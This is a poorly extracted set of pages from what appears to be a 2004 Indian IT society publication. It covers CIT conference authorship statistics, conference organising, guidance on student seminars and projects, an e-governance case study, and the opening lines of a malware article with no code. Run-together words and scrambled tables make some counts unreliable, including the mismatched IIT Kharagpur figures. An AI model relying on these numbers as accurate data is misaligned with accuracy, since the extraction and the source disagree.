[10] Hall D Mathematical Techniques inMultisensor Data Fusion 1992 ArtechHouse Boston MA

[11]L F Pau Sensor data fusion Journal ofIntelligent and Robotics Systems vol 1pp 103-116 1988

[12] DSTO (Defence Science and TechnologyOrganization) Data Fusion SpecialInterest Group Data fusion lexiconDepartment of Defence Australia 7 p21 September 1994

[13] Varshney P Distributed Detection and DataFusion 1995 Springer-Verlag NewYork NY

[14] Wald L A European proposal for terms ofreference in data fusion InternationalArchives of Photogrammetry and RemoteSensing Vol XXXII Part 7

[15]Cyber Forensics by Simson Garfinkel

[16] Waltz E and Llinas J Multisensor DataFusion 1990 Artech House Boston MA

OITS-2004

21

The Conferences on InformationTechnology or CITs as they are more popularlyknown have been organised by the OrissaInformation Technology Society every year since1998 It was the first ever internationalconference on IT to be held in Orissa and becamean instant hit The overwhelming success of thisedition conveyed the message that not only hadCIT arrived but it was here to stay Apart fromtheir successes academically these conferencesalso present some interesting patterns regardingthe multiplicity of the authors their regions aswell as the areas of research1 Multiplicity of authors

The papers presented in these conferenceshave had authors ranging between one andseven However it has been found that papershaving two and three authors have dominatedwhile papers having five or more authors havebeen few and far between (Fig1) The onlyexception came in the first edition when papershaving two authors comprised more than three-fifths of the total number of papers (Fig2) Thedetails of the multiplicity of authors have beenpresented in Table 1 which is drawn

Interesting Patterns in CITsA Misra

Silicon School of Information TechnologySilicon Hills Patia Bhubaneswar-751031

aurabindasiliconacin

2 Regions of participations In this section we will consider the

participating regions in terms of countries aswell as institutes With India being the hostcountry she has the maximum representationunderstandably But if we look at the trends inthe participation of other countries we can alsoobserve certain interesting patterns

Firstly the United States has the highestrepresentation from overseas having at least oneauthor in thirty-five papers over the six editionsIt is followed by Japan (11) and Australia(10) inthat order (Table 2) It may be noted with interestthat there were three papers from Brazil in the1999 edition but those are the only papers fromBrazil till date Besides there are about twelvecountries which have only one occurrence whileUSA and Japan have been represented in everyedition

However one discouraging factor has beenthe sharp decline in overseas participants overthe six editions (Fig 3) While in the first edition5405 of the papers had at least one overseasauthor the figure has been hovering around the25 mark in the last four editions In spite ofthis 2003 has recorded the highest number ofpapers having overseas particpation ietwenty-one

On the contrary papers from Orissa havebeen increasing steadily every year which hasbeen shown in Fig 4

As far as Institutes are concerned then theIITs have been the most prominent with theexceptions of IIT Delhi and IIT Roorkee whichhave respectively six and one one contributions

Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

